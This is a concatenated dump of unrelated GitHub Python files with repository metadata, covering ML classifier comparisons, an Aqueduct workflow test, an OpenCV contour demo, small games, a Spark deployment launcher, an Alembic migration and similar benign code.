label_data_NBC[val_index]\n\n train_data_RVFL = vector_data_RVFL[train_index]\n train_label_RVFL = label_data_RVFL[train_index]\n test_data_RVFL = vector_data_RVFL[val_index]\n test_label_RVFL = label_data_RVFL[val_index]\n\n #支持向量机\n clf=svm.SVC()\n clf.fit(train_data_RVFL,train_label_RVFL)\n temp=0\n correct=0\n Predict_Matrix_test=clf.predict(test_data_RVFL)\n for i in range(len(test_label_RVFL)):\n if Predict_Matrix_test[i]==test_label_RVFL[i]:\n correct+=1\n test_accuracy_svc.append(correct/len(test_label_RVFL))\n\n correct=0\n Predict_Matrix_train=clf.predict(train_data_RVFL)\n for i in range(len(train_label_RVFL)):\n if Predict_Matrix_train[i]==train_label_RVFL[i]:\n correct+=1\n train_accuracy_svc.append(correct/len(train_label_RVFL))\n print(test_accuracy_svc,train_accuracy_svc)\n\n\n\n\n #NN神经网路\n clf = MLPClassifier(hidden_layer_sizes = (500,), activation = 'relu',\n solver = 'lbfgs', alpha = 0.0001, batch_size = 'auto',\n learning_rate = 'constant')\n clf.fit(train_data_RVFL,train_label_RVFL)\n\n temp=0\n correct=0\n Predict_Matrix_test=clf.predict(test_data_RVFL)\n for i in range(len(test_label_RVFL)):\n if Predict_Matrix_test[i]==test_label_RVFL[i]:\n correct+=1\n test_accuracy_NN.append(correct/len(test_label_RVFL))\n\n correct=0\n Predict_Matrix_train=clf.predict(train_data_RVFL)\n for i in range(len(train_label_RVFL)):\n if Predict_Matrix_train[i]==train_label_RVFL[i]:\n correct+=1\n train_accuracy_NN.append(correct/len(train_label_RVFL))\n print(test_accuracy_NN,train_accuracy_NN)\n\n\n\n\n #贝叶斯分类器\n\n clf = GaussianNB()\n\n Start = time.time()\n clf.fit(train_data_RVFL,train_label_RVFL)\n End = time.time()\n print(\"NB训练时间\", End - Start)\n temp=0\n correct=0\n\n Start = time.time()\n Predict_Matrix_test=clf.predict(test_data_RVFL)\n\n\n for i in range(len(test_label_RVFL)):\n if Predict_Matrix_test[i]==test_label_RVFL[i]:\n correct+=1\n test_accuracy_NB.append(correct/len(test_label_RVFL))\n End = time.time()\n print(\"NB测试时间\", End - Start)\n correct=0\n Predict_Matrix_train=clf.predict(train_data_RVFL)\n for i in range(len(train_label_RVFL)):\n if Predict_Matrix_train[i]==train_label_RVFL[i]:\n correct+=1\n train_accuracy_NB.append(correct/len(train_label_RVFL))\n print(test_accuracy_NB,train_accuracy_NB)\n\n\n \n\n\n #决策树C4.5\n clf=RandomForestClassifier()\n clf.fit(train_data_NBC,train_label_NBC)\n\n temp=0\n correct=0\n Predict_Matrix_test=clf.predict(test_data_NBC)\n for i in range(len(test_label_NBC)):\n if Predict_Matrix_test[i]==test_label_NBC[i]:\n correct+=1\n test_accuracy_cart.append(correct/len(test_label_NBC))\n\n correct=0\n Predict_Matrix_train=clf.predict(train_data_NBC)\n for i in range(len(train_label_NBC)):\n if Predict_Matrix_train[i]==train_label_NBC[i]:\n correct+=1\n train_accuracy_cart.append(correct/len(train_label_NBC))\n print(test_accuracy_cart,train_accuracy_cart)\n\n #随机森林\n clf=tree.DecisionTreeClassifier()\n clf.fit(train_data_NBC,train_label_NBC)\n temp=0\n correct=0\n Predict_Matrix_test=clf.predict(test_data_NBC)\n for i in range(len(test_label_NBC)):\n if Predict_Matrix_test[i]==test_label_NBC[i]:\n correct+=1\n test_accuracy_rt.append(correct/len(test_label_NBC))\n\n correct=0\n Predict_Matrix_train=clf.predict(train_data_NBC)\n for i in range(len(train_label_NBC)):\n if Predict_Matrix_train[i]==train_label_NBC[i]:\n correct+=1\n train_accuracy_rt.append(correct/len(train_label_NBC))\n print(test_accuracy_rt,train_accuracy_rt)\n\n\n\narr_mean_train_svc = np.mean(train_accuracy_svc)\narr_std_train_svc = np.std(train_accuracy_svc)\narr_mean_test_svc=np.mean(test_accuracy_svc)\narr_std_test_svc=np.std(test_accuracy_svc)\n\nprint(\"svc测试集平均及标准差为\", arr_mean_test_svc, arr_std_test_svc)\nprint(\"svc训练集平均值及标准差\", arr_mean_train_svc, arr_std_train_svc)\n\narr_mean_train_NN = np.mean(train_accuracy_NN)\narr_std_train_NN = np.std(train_accuracy_NN)\narr_mean_test_NN=np.mean(test_accuracy_NN)\narr_std_test_NN=np.std(test_accuracy_NN)\n\nprint(\"NN测试集平均及标准差为\", arr_mean_test_NN, arr_std_test_NN)\nprint(\"NN训练集平均值及标准差\", arr_mean_train_NN, arr_std_train_NN)\n\narr_mean_train_NB = np.mean(train_accuracy_NB)\narr_std_train_NB= np.std(train_accuracy_NB)\narr_mean_test_NB=np.mean(test_accuracy_NB)\narr_std_test_NB=np.std(test_accuracy_NB)\n\nprint(\"NB测试集平均及标准差为\", arr_mean_test_NB, arr_std_test_NB)\nprint(\"NB训练集平均值及标准差\", arr_mean_train_NB, arr_std_train_NB)\n\narr_mean_train_cart = np.mean(train_accuracy_cart)\narr_std_train_cart= np.std(train_accuracy_cart)\narr_mean_test_cart=np.mean(test_accuracy_cart)\narr_std_test_cart=np.std(test_accuracy_cart)\n\nprint(\"cart测试集平均及标准差为\", arr_mean_test_cart, arr_std_test_cart)\nprint(\"cart训练集平均值及标准差\", arr_mean_train_cart, arr_std_train_cart)\n\narr_mean_train_rt = np.mean(train_accuracy_rt)\narr_std_train_rt= np.std(train_accuracy_rt)\narr_mean_test_rt=np.mean(test_accuracy_rt)\narr_std_test_rt=np.std(test_accuracy_rt)\n\nprint(\"rt测试集平均及标准差为\", arr_mean_test_rt, arr_std_test_rt)\nprint(\"rt训练集平均值及标准差\", arr_mean_train_rt, arr_std_train_rt)\n\n\n\n\n\n\n\n\n\n","repo_name":"ouguiliang110/NaiveBayesNetCheck","sub_path":"NBC-RVFC 集成算法/对比实验算法.py","file_name":"对比实验算法.py","file_ext":"py","file_size_in_byte":7663,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70198685549","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\n\nimport aqueduct as aq\n\nNAME = \"succeed_complex\"\nDESCRIPTION = \"\"\"* Workflows Page: should succeed.\n* Workflow Details Page: everything should be green.\n* Data Page: pred_ensemble artifact should appears.\"\"\"\n\n\n@aq.op(requirements=[\"numpy\"])\ndef log_featurize(cust: pd.DataFrame) -> pd.DataFrame:\n features = cust.copy()\n skip_cols = [\"cust_id\", \"using_deep_learning\", \"using_dbt\"]\n\n for col in features.columns.difference(skip_cols):\n features[\"log_\" + col] = np.log(features[col] + 1.0)\n\n return features.drop(columns=\"cust_id\")\n\n\ndef deploy(client, integration):\n customers_table = pd.read_csv(\n \"https://raw.githubusercontent.com/aqueducthq/aqueduct/main/examples/churn_prediction/data/customers.csv\"\n )\n churn_table = pd.read_csv(\n \"https://raw.githubusercontent.com/aqueducthq/aqueduct/main/examples/churn_prediction/data/churn_data.csv\"\n )\n features_table = log_featurize.local(customers_table)\n\n linear_model = LogisticRegression(max_iter=10000)\n linear_model.fit(features_table, churn_table[\"churn\"])\n decision_tree_model = DecisionTreeClassifier(max_depth=10, min_samples_split=3)\n decision_tree_model.fit(features_table, churn_table[\"churn\"])\n\n @aq.op(requirements=[\"scikit-learn\"])\n def predict_linear(features_table):\n return pd.DataFrame({\"linear\": linear_model.predict_proba(features_table)[:, 1]})\n\n @aq.op(requirements=[\"scikit-learn\"])\n def predict_tree(features_table):\n return pd.DataFrame({\"tree\": decision_tree_model.predict_proba(features_table)[:, 1]})\n\n @aq.op(requirements=[])\n def predict_ensemble(customers_table, linear_pred_table, tree_pred_table):\n return customers_table.assign(\n prob_churn=linear_pred_table.join(tree_pred_table).mean(axis=1)\n )\n\n warehouse = client.resource(name=integration)\n customers_table = warehouse.sql(query=\"SELECT * FROM customers;\")\n features_table = log_featurize(customers_table)\n linear_pred_table = predict_linear(features_table)\n tree_pred_table = predict_tree(features_table)\n churn_table = predict_ensemble(customers_table, linear_pred_table, tree_pred_table)\n\n @aq.check(description=\"Ensuring valid probabilities.\", requirements=[])\n def valid_probabilities(df: pd.DataFrame):\n return (df[\"prob_churn\"] >= 0) & (df[\"prob_churn\"] <= 1)\n\n valid_probabilities(churn_table)\n avg_pred_churn_metric = churn_table.mean(\"prob_churn\")\n avg_pred_churn_metric.bound(lower=0.1)\n avg_pred_churn_metric.bound(upper=0.3)\n avg_pred_churn_metric.bound(upper=0.4, severity=\"error\")\n warehouse.save(churn_table, \"pred_churn\", aq.LoadUpdateMode.REPLACE)\n client.publish_flow(\n name=NAME,\n description=DESCRIPTION,\n artifacts=[churn_table, avg_pred_churn_metric],\n schedule=aq.hourly(),\n )\n","repo_name":"aqueducthq/aqueduct","sub_path":"manual_qa_tests/workflows/succeed_complex.py","file_name":"succeed_complex.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","stars":488,"dataset":"github-code","pt":"37"} +{"seq_id":"24928825471","text":"import setuptools\n\nwith open('README.md') as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name='streamside',\n version='0.5',\n scripts=[],\n author='Jinho D. Choi',\n author_email='jinho.choi@emory.edu',\n description='Meaning Representation Annotation Toolkit',\n long_description=long_description,\n long_description_content_type='text/markdown',\n url='https://github.com/emorynlp/StreamSide',\n packages=setuptools.find_packages(),\n install_requires=[\n 'PyQt5==5.15.4'\n ],\n classifiers=[\n 'Programming Language :: Python :: 3',\n 'License :: OSI Approved :: Apache Software License',\n 'Operating System :: OS Independent',\n ],\n package_data={'streamside': ['resources/*/*.json']},\n include_package_data=True\n )","repo_name":"emorynlp/StreamSide","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"11873001770","text":"import cv2\nimport numpy as np\n\ndef cv2show(name : str, img ):\n cv2.imshow(name, img)\n cv2.waitKey(0)\n\nif __name__ == '__main__':\n img1 = cv2.imread(r'./1.jpg')\n img1_gray = cv2.cvtColor(img1,cv2.COLOR_BGR2GRAY)\n cv2show('img1',img1)\n print(img1.shape)\n # I. Find Contour\n # 圖形二值化 binary : 灰階值>127 → 255 , 灰階值<127 → 0 \n ret, thresh = cv2.threshold(img1_gray, 127, 255, cv2.THRESH_BINARY)\n cv2show('Binarize', thresh)\n\n # 尋找二值化後圖形的輪廓\n contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n # contours (描述輪廓的list), hierarchy (階級(目前不重要))\n \n # 找到紀錄輪廓的list (contours)後,接下來直接使用method畫出來 \n cv2.drawContours(img1, contours, -1 ,( 0, 255, 255) , 1) # (src, contours , index of contours (-1 to draw all contours), (B,G,R), thickness)\n cv2show('Contours',img1)\n\n # II. estimate Approximation Contour (只能找到Contours(list裝有多個輪廓)其中一個輪廓並繪製近似輪廓)\n one_contour = contours[21] # 從裝有許多輪廓的列表中,取出一個輪廓\n epsilon = 0.1 * cv2.arcLength(one_contour,True) # arcLength, 計算目標輪廓的周長,可以藉由調整閾值epsilon來找出一個近似輪廓\n print('周長為 : ', cv2.arcLength(one_contour,True))\n approx = cv2.approxPolyDP(one_contour, epsilon, True)\n cv2.drawContours(img1, [approx], -1 ,( 255, 255, 0) , 2)\n cv2show('Contours vs Approx Contours',img1)","repo_name":"joshsmiththenoob/OpenCV_Image_Processing","sub_path":"OpenCV_contour_approximation.py","file_name":"OpenCV_contour_approximation.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30658006134","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nage = 22\nfor i in range(10):\n print('new i2',i)\n if i<3:\n guess_num = int(input(\"input your guess num:\"))\n if guess_num == age:\n print(\"Congratulations! you got it.\")\n break # jump all loop\n elif guess_num > age:\n print(\"Think smaller!\")\n else:\n print(\"Think Big....\")\n else:\n #print(\"too many attempts....bye\")\n #break\n continue_confirm = input(\"Do you want to continue because you are stupid:\")\n if continue_confirm == 'y':\n\n i = 0\n print('new i',i)\n else:\n print(\"bye\")\n break\n\n\n","repo_name":"pangguoping/python-study","sub_path":"day1/guess_agev3.py","file_name":"guess_agev3.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3840726488","text":"import pandas as pd\n\n\ndef run(simulation_time_steps, r0, recovering_rate, exposure_rate, death_rate, death_proportion_rate,susceptible, exposed, infected, recovered, dead, drop_midsteps: bool=True) -> pd.DataFrame:\n \"\"\"\n Run all experiments and return their output on the dataset column.\n Each line represents an iteration of the parameter-sweep combinations.\n \"\"\"\n # The following imports NEED to be in the exact order\n from cadCAD.engine import ExecutionMode, ExecutionContext, Executor\n\n # Simulation configs, input any new simulations here\n from covid_19_seird import config\n\n #from {new_simulation} import config\n\n from cadCAD import configs\n import pandas as pd\n from covid_19_seird import config\n config.get_config(simulation_time_steps, r0, recovering_rate, exposure_rate, death_rate, death_proportion_rate,susceptible, exposed, infected, recovered, dead)\n exec_mode = ExecutionMode()\n multi_proc_ctx = ExecutionContext(context=exec_mode.multi_proc)\n run = Executor(exec_context=multi_proc_ctx, configs=configs)\n results = pd.DataFrame()\n i = 0\n for raw_result, _ in run.execute():\n params = configs[i].sim_config['M']\n result_record = pd.DataFrame.from_records([tuple([i for i in params.values()])], columns=list(params.keys()))\n\n df = pd.DataFrame(raw_result)\n # keep only last substep of each timestep\n if drop_midsteps:\n max_substep = max(df.substep)\n is_droppable = (df.substep!=max_substep)&(df.substep!=0)\n df.drop(df[is_droppable].index, inplace=True)\n\n result_record['dataset'] = [df]\n results = results.append(result_record)\n i += 1\n return results.reset_index()","repo_name":"marthendalnunes/covid-simulation","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"27882900081","text":"\"\"\"update-sf133-datatypes\n\nRevision ID: 5a9051f9bfc5\nRevises: a0a4f1ef56ae\nCreate Date: 2016-08-11 11:44:49.640398\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '5a9051f9bfc5'\ndown_revision = 'a0a4f1ef56ae'\nbranch_labels = None\ndepends_on = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade(engine_name):\n globals()[\"upgrade_%s\" % engine_name]()\n\n\ndef downgrade(engine_name):\n globals()[\"downgrade_%s\" % engine_name]()\n\n\ndef upgrade_data_broker():\n op.alter_column('sf_133', 'fiscal_year', nullable=False)\n op.execute('ALTER TABLE sf_133 ALTER COLUMN fiscal_year TYPE INTEGER USING (fiscal_year::integer)')\n\n op.alter_column('sf_133', 'period', nullable=False)\n op.execute('ALTER TABLE sf_133 ALTER COLUMN period TYPE INTEGER USING (period::integer)')\n\n\ndef downgrade_data_broker():\n op.alter_column('sf_133', 'period',\n existing_type=sa.Integer(),\n type_=sa.TEXT(),\n nullable=True)\n op.alter_column('sf_133', 'fiscal_year',\n existing_type=sa.Integer(),\n type_=sa.TEXT(),\n nullable=True)\n\n","repo_name":"fedspendingtransparency/data-act-broker-backend","sub_path":"dataactcore/migrations/versions/5a9051f9bfc5_update_sf133_datatypes.py","file_name":"5a9051f9bfc5_update_sf133_datatypes.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"37"} +{"seq_id":"28312762078","text":"from turtle import Screen\nfrom paddle import Paddle\nfrom ball import Ball\nfrom scoreboard import Scoreboard\nimport time\nscreen= Screen()\nscreen.setup(width=800, height= 600)\nscreen.bgcolor(\"black\")\nscreen.title(\"Pong\")\npaddle=Paddle((350,0))\npaddle2=Paddle((-350,0))\nball=Ball(1)\nscreen.tracer(0)\nscoreL=Scoreboard((-200,250))\nscoreR=Scoreboard((200,250))\n\n\n\nscreen.listen()\nscreen.onkey(paddle.goUp,\"Up\")\nscreen.onkey(paddle.goDown,\"Down\")\nscreen.onkey(paddle2.goUp,\"w\")\nscreen.onkey(paddle2.goDown,\"s\")\ngameLive=True\nwhile gameLive:\n time.sleep(ball.movespeed)\n screen.update()\n ball.moveBall()\n if ball.ycor()>=280 or ball.ycor()<=-280:\n ball.bounce()\n if ball.distance(paddle) <60 and ball.xcor()>=340:\n ball.hit()\n if ball.distance(paddle2) <60 and ball.xcor()<=-340:\n ball.hit()\n if ball.xcor()>=420:\n scoreL.scorePoint()\n ball=Ball(-1)\n if ball.xcor()<=-420:\n scoreR.scorePoint()\n ball=Ball(1)\n\n\nscreen.exitonclick()\n","repo_name":"gonzalocdlp/Python_Projects","sub_path":"21Pong/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75129332267","text":"import argparse\nimport configparser\nimport subprocess\nimport os\nimport sys\nimport logging\nimport zipfile\nimport shutil\n\nfrom backbone_pyspark_deploy.arg_parser import ArgParser\nfrom backbone_pyspark_deploy.logger import create_logger\n\n\ndef set_env(key, value):\n \"\"\"\n\n :param key:\n :param value:\n :return:\n \"\"\"\n\n if os.getenv(key) is None:\n if value is None:\n sys.exit(-1)\n else:\n os.environ[key] = value\n\n return os.getenv(key)\n\n\ndef main():\n \"\"\"\n Entry point for .pex\n\n :return: spark-submit\n \"\"\"\n\n # ------------------------------------------------------------------------------------------------------------------\n # CONFIGURATION FILES default values\n\n CUR_DIR = os.getcwd()\n\n # ------------------------------------------------------------------------------------------------------------------\n # PARSE ARGUMENTS\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--properties\", metavar=\"FILE\", required=True, help=\"configuration file .ini\")\n parser.add_argument(\"--params\", metavar=\"FILE\", required=True, help=\"parameters file .json\")\n\n parser.add_argument(\"--predict\", action=\"store_true\",\n help=\"train model (--predict not present [default]) or make prediction (--predict)\")\n\n parser.add_argument(\"--spark-home\", metavar=\"SPARK_HOME\", help=\"Path to SPARK_HOME\", required=False)\n parser.add_argument(\"--master\", metavar=\"SPARK MASTER\", help=\"Spark master\", default=None)\n\n parser.add_argument(\"--deploy-mode\", metavar=\"DEPLOY MODE\", choices=[\"cluster\", \"client\"], help=\"Spark deploy mode\",\n default=None)\n\n parser.add_argument(\"--num-executors\", metavar=\"\", help=\"Number of executors (ex: 2)\", default=None)\n parser.add_argument(\"--executor-memory\", metavar=\"\", help=\"Executor memory (ex: 8G)\", default=None)\n parser.add_argument(\"--executor-cores\", metavar=\"\", help=\"Executor cores (ex: 8)\", default=None)\n parser.add_argument(\"--py-files\", metavar=\"PKG\", help=\"Path to .pex file\", default=None)\n parser.add_argument(\"--name\", metavar=\"\", help=\"Application name\", default=None)\n\n parser.add_argument(\"log-path\", metavar=\"FILE\", help=\"Path to log file\", default=None)\n\n args = parser.parse_args()\n\n # Load run_config.ini file\n runconf = configparser.ConfigParser()\n runconf.read(args.properties)\n\n arg_parser_ini = ArgParser(args=vars(args), config_file=runconf)\n\n # logger\n log_path = arg_parser_ini.arg_parse(argument_key=\"log_path\", config_section=\"logging\", config_key=\"log-path\")\n logger = create_logger(name=\"backone_pyspark_deploy\", level=logging.DEBUG, log_file_path=log_path)\n\n # spark-home\n spark_home = arg_parser_ini.arg_parse(argument_key=\"spark_home\", config_section=\"spark-cli\", config_key=\"spark-home\")\n set_env(\"SPARK_HOME\", spark_home)\n\n logger.debug(\"SPARK HOME: {}\".format(os.getenv(\"SPARK_HOME\")))\n\n # master\n master = arg_parser_ini.arg_parse(argument_key=\"master\", config_section=\"spark-cli\", config_key=\"master\")\n logger.debug(\"Master parameter: {}\".format(master))\n\n # deploy-mode\n deploy_mode = arg_parser_ini.arg_parse(argument_key=\"deploy_mode\", config_section=\"spark-cli\",\n config_key=\"deploy-mode\")\n logger.debug(\"Deploy mode parameter: {}\".format(deploy_mode))\n\n # num-executors\n num_executors = arg_parser_ini.arg_parse(argument_key=\"num_executors\", config_section=\"spark-cli\",\n config_key=\"num-executors\")\n logger.debug(\"Number executors parameter: {}\".format(num_executors))\n\n # executor-memory\n executor_memory = arg_parser_ini.arg_parse(argument_key=\"executor_memory\", config_section=\"spark-cli\",\n config_key=\"executor-memory\")\n logger.debug(\"Executor memory parameter: {}\".format(executor_memory))\n\n # executor-cores\n executor_cores = arg_parser_ini.arg_parse(argument_key=\"executor_cores\", config_section=\"spark-cli\",\n config_key=\"executor-cores\")\n logger.debug(\"Executor cores parameter: {}\".format(executor_cores))\n\n # py-files\n py_files = arg_parser_ini.arg_parse(argument_key=\"py_files\", config_section=\"spark-cli\", config_key=\"py-files\")\n logger.debug(\"Py files parameter: {}\".format(py_files))\n\n # name\n name = arg_parser_ini.arg_parse(argument_key=\"name\", config_section=\"spark-cli\", config_key=\"name\")\n logger.debug(\"Name parameter: {}\".format(name))\n\n zip_list = os.listdir(os.path.join(spark_home, \"python\", \"lib\"))\n\n sys.path.append([os.path.join(spark_home, \"python\", \"lib\", zip_file) for zip_file in zip_list])\n\n # ------------------------------------------------------------------------------------------------------------------\n # UNZIP PEX\n\n pex = sys.argv[0]\n logger.debug(\"PEX: {}\".format(pex))\n\n zipper = zipfile.ZipFile(pex)\n zipper.extractall(path=os.path.join(CUR_DIR, \".backbone_pyspark_deploy\"))\n\n # ------------------------------------------------------------------------------------------------------------------\n # SPARK SUBMIT\n\n backbone_pyspark_egg = \"\"\n egg_list = os.listdir(os.path.join(CUR_DIR, \".backbone_pyspark_deploy\", \".deps\"))\n logger.debug(\"egg-list: {}\".format(str(egg_list)))\n py_files = (\"\" if py_files is None else py_files)\n\n for egg in egg_list:\n zipped = shutil.make_archive(base_name=egg, format=\"zip\",\n root_dir=os.path.join(CUR_DIR, \".backbone_pyspark_deploy\", \".deps\", egg))\n logger.debug(\"zipped: {}\".format(zipped))\n if \"backbone_pyspark_deploy\" in egg:\n backbone_pyspark_egg = egg\n logger.debug(\"backbone_pyspark_egg: {}\".format(backbone_pyspark_egg))\n py_files += \",\" + os.path.join(CUR_DIR, \".backbone_pyspark_deploy\", \".deps\", zipped)\n py_files = py_files.strip(\",\")\n\n spark_conf_list = arg_parser_ini.spark_conf_list()\n\n logger.debug(\"--py-files: {}\".format(py_files))\n\n config_files = args.properties + \",\" + args.params + \",\" + os.path.join(spark_home, \"conf\", \"hive-site.xml\")\n\n logger.debug(\"--files: {}\".format(config_files))\n\n logger.debug(\"--params: {}\".format(args.params))\n\n logger.debug(\"--predict: {}\".format(args.predict))\n\n logger.debug(\"--log-path: {}\".format(log_path))\n\n spark_submit = os.path.join(spark_home, \"bin\", \"spark-submit\")\n\n predict = int(args.predict)\n\n params = (os.path.join(args.params) if deploy_mode == \"cluster\" else args.params)\n\n cmd = [\n spark_submit,\n \"--master\", master,\n \"--deploy-mode\", deploy_mode,\n \"--num-executors\", num_executors,\n \"--executor-memory\", executor_memory,\n \"--executor-cores\", executor_cores,\n \"--name\", name,\n \"--files\", config_files,\n \"--py-files\", py_files\n ] + spark_conf_list + \\\n [\n os.path.join(CUR_DIR, \".backbone_pyspark_deploy\", \".deps\",\n backbone_pyspark_egg, \"backbone_pyspark_deploy\", \"driver.py\"),\n \"--params\", params,\n \"--predict\", str(predict),\n \"--log-path\", log_path\n ]\n\n logger.debug(\"cmd spark-submit: {}\".format(str(cmd)))\n\n subprocess.run(cmd)\n\n\nif __name__ == \"__main__\":\n try:\n main()\n except Exception as e:\n logging.error(\"Error in main\", )\n\n\n","repo_name":"giulbia/backbone_pyspark_deploy","sub_path":"backbone_pyspark_deploy/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7503,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"13080618091","text":"from typing import List\n\n# brute force \ndef LIS(nums: List[int]) -> int:\n if not nums:\n return 0\n ret = 0\n for i, n in enumerate(nums):\n temp = 1\n last_val = n\n for m in nums[i+1:]:\n if m > last_val:\n temp += 1\n last_val = m\n\n ret = max(ret, temp)\n\n return ret\n\nprint(LIS([10,9,2,5,3,7,101,18]))\n\n\n# lower bound\n\nclass Solution():\n def lengthOfLIS(self, nums: List[int]) -> int:\n if not nums:\n return 0\n seq = []\n for n in nums:\n p = self.lower_bound(seq, n)\n if p == len(seq):\n seq.append(n)\n else:\n seq[p] = n\n\n return len(seq)\n\n def lower_bound(self, nums: List[int], target: int) -> int:\n l, r = 0, len(nums)\n\n while l < r:\n mid = (l + r) // 2\n\n if nums[mid] >= target:\n r = mid\n else:\n l = mid + 1\n\n return l\n\ns = Solution();\n\nprint(s.lengthOfLIS([10,9,2,5,3,7,101,18]))\n","repo_name":"alfmunny/coding-practice","sub_path":"300.py","file_name":"300.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72181809387","text":"from qrcode.image.base import BaseImage\nfrom qrcode import make as makeqr\nfrom PyQt5.QtGui import QPixmap, QImage, QPainter\nfrom PyQt5.QtCore import Qt\n\nclass PixmapImage(BaseImage):\n \"\"\"\n A way to create Qt-Compatible qr codes and turn them to pixmaps\n \"\"\"\n def __init__(self, border, width, box_size):\n self.border = border\n self.width = width\n self.box_size = box_size\n size = (width + border * 2) * box_size\n self._image = QImage(\n size, size, QImage.Format_RGB16)\n self._image.fill(Qt.white)\n\n def pixmap(self):\n return QPixmap.fromImage(self._image)\n\n def drawrect(self, row, col):\n painter = QPainter(self._image)\n painter.fillRect(\n (col + self.border) * self.box_size,\n (row + self.border) * self.box_size,\n self.box_size, self.box_size,\n Qt.black)\n\n def save(self, stream, kind=None):\n pass\n\ndef genqrpixmap(data: str):\n \"\"\"\n Creates a qr pixmap with the given data\n \"\"\"\n return makeqr(data, image_factory=PixmapImage).pixmap().scaled(150,150)","repo_name":"giorgiolongo/SpaghettiQueue","sub_path":"spaghettiqueue/qr.py","file_name":"qr.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"17268181602","text":"import pandas as pd\nimport numpy as np\n\n\ndef envelope(signal, rate, threshold):\n mask = []\n y = pd.Series(signal).apply(np.abs)\n y_mean = y.rolling(window=int(rate/10), min_periods=1, center=True).mean()\n for mean in y_mean:\n if mean > threshold:\n mask.append(True)\n else:\n mask.append(False)\n\n return mask\n\n\ndef calc_fft(signal, rate):\n n = len(signal)\n freq = np.fft.rfftfreq(n, d=1 / rate)\n Y = abs(np.fft.rfft(signal) / n)\n # print(\"======================================\")\n # print(Y)\n # print(\"======================================\")\n # print(freq)\n return Y, freq\n","repo_name":"isurusamarasekara/Speech-Emotion-Recognition","sub_path":"back_end/calculations.py","file_name":"calculations.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4196984705","text":"\"\"\"Recomendaciones:\n - Recuerde almacenar las respuestas tal como se pide en cada ejercicio\n - Se resuelve de manera individual, la copia será anulada.\n - Muestre sus procedimientos de manera clara\"\"\"\n\n# nombre_completo = \"Jhanth Carlo Castillo Perez\" #Por favor ingrese su nombre en las comillas\n\n#------------------------ EJERCICIO 1 --------------------------------\n\"\"\"\nCree los siguientes rangos (tipo range()): \n rango1 => 334, 331, 328, 325, ... 4, 1\n rango2 => -5,-3,-1, 1, 3, 5, ... 999\n rango3 => -50, -55, -60, -65, -70, ... -195, -200\nDespués de obtener los rangos, almacenelos de la siguiente manera:\nlistaDeRangos = [rango1, rango2, rango3]\n\"\"\"\nprint(\"\\n----- EJERCICIO 1 -----\")\n\nrango1= range(334, 0,-3)\nrango2= range(-5, 1000, 2)\nrango3= range(-50, -201, -5)\n\nlistaDeRangos = [rango1, rango2, rango3]\nprint(listaDeRangos)\n\n#------------------------ EJERCICIO 2 --------------------------------\n\"\"\"\nDados los siguientes puntos geométricos:\n\"P1\" ==> (2, 2, 3) \"P6\" ==> (1, 0.5, 1)\n\"P2\" ==> (2, 3, 4) \"P7\" ==> (3, 2, 0.5)\n\"P3\" ==> (1, 1, 3) \"P8\" ==> (3, 1, 2)\n\"P4\" ==> (0.5, 0.5, 2) \"P9\" ==> (0, 0, 0)\n\"P5\" ==> (1, 2, 1) \"P10\" ==> (2, 0, 0.5) \nDetermine el par de puntos que se encuentran más cercanos.\nAlmacene la respuesta en un string llamado parCercano. Ejemplo:\nparCercano = \"P2-P3\" \n\"\"\"\nprint(\"\\n----- EJERCICIO 2 -----\")\n\n\"distancia = ((x1-x2)**2 + (y1-y2)**2 + (z1-z2)**2)**(1/2)\"\n\n# Se calcula la distancia entre cada punto.\n\"Con respecto al P1\"\nD1_2=((2-2)**2+(2-3)**2+(3-4)**2)**1/2\nD1_3=((2-1)**2+(2-1)**2+(3-3)**2)**1/2\nD1_4=((2-0.5)**2+(2-0.5)**2+(3-2)**2)**1/2\nD1_5=((2-1)**2+(2-2)**2+(3-1)**2)**1/2\nD1_6=((2-1)**2+(2-0.5)**2+(3-1)**2)**1/2\nD1_7=((2-3)**2+(2-2)**2+(3-0.5)**2)**1/2\nD1_8=((2-3)**2+(2-1)**2+(3-2)**2)**1/2\nD1_9=((2-0)**2+(2-0)**2+(3-0)**2)**1/2\nD1_10=((2-2)**2+(2-0)**2+(3-0.5)**2)**1/2\n\n\"Con respecto al 